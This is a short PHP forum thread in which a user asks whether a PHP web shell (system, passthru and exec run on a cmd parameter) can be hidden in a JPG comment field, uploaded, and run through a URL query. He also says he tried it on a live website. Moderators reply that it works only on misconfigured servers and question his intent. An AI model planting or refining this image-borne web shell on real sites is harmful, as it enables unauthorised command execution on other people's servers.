PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.		  
Loading
It is currently Thu Aug 06, 2020 11:24 pm

View unanswered posts | View active topics


Board index » Programming » Testing

All times are UTC - 5 hours




Post new topic Reply to topic  Page 1 of 1
  [ 4 posts ] 
  Print view Previous topic | Next topic 
Author Message
M0TRIX
 Post subject: is it impossible???
PostPosted: Thu Jun 19, 2014 7:49 am 
Offline
Forum Newbie

Joined: Thu Jun 19, 2014 7:45 am
Posts: 2
hello

follow the steps:

1_download edjpgcom.exe program.

2_drag the jpg file in the edjpgcom program the u can put your cods into the jpg file

3_put these codes into it :

Syntax: [ Download ] [ Hide ]
 <?PHP
system($cmd);
passthru($cmd);
exec($cmd);
?>


>

4_upload the jpg file.

5_run it like this image.jpg?cmd=ls

do u think is it possible to run command with this method??? or other extense of image files like png gif etc..
Top
 Profile  
 
Weirdan
 Post subject: Re: is it impossible???
PostPosted: Thu Jun 19, 2014 12:19 pm 
Offline
Moderator
User avatar

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
That's possible, however only if the webserver is misconfigured to process image files through php. Another exploit vector would exploiting attacker-controlled includes, but if that's possible it would itself be a security issue.
Top
 Profile  
 
M0TRIX
 Post subject: Re: is it impossible???
PostPosted: Thu Jun 19, 2014 5:00 pm 
Offline
Forum Newbie

Joined: Thu Jun 19, 2014 7:45 am
Posts: 2
i've test it on a website.i just see the picture !!!but no command works!! why????there is php cod in it. it should work

i put <php and ?> characters in it.the webserver should recgnize it as a php file.huu??

is there any way to run our command with the picture??

so what is "edjpgcom.exe"(first post) program for?
Top
 Profile  
 
Celauran
 Post subject: Re: is it impossible???
PostPosted: Thu Jun 19, 2014 6:47 pm 
Offline
Moderator
User avatar

Joined: Tue Nov 09, 2010 3:39 pm
Posts: 6425
Location: Montreal, Canada
What are you trying to do here? Having shell_exec and/or exec enabled on a server is a pretty terrible idea.
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 4 posts ] 

Board index » Programming » Testing

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 7 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group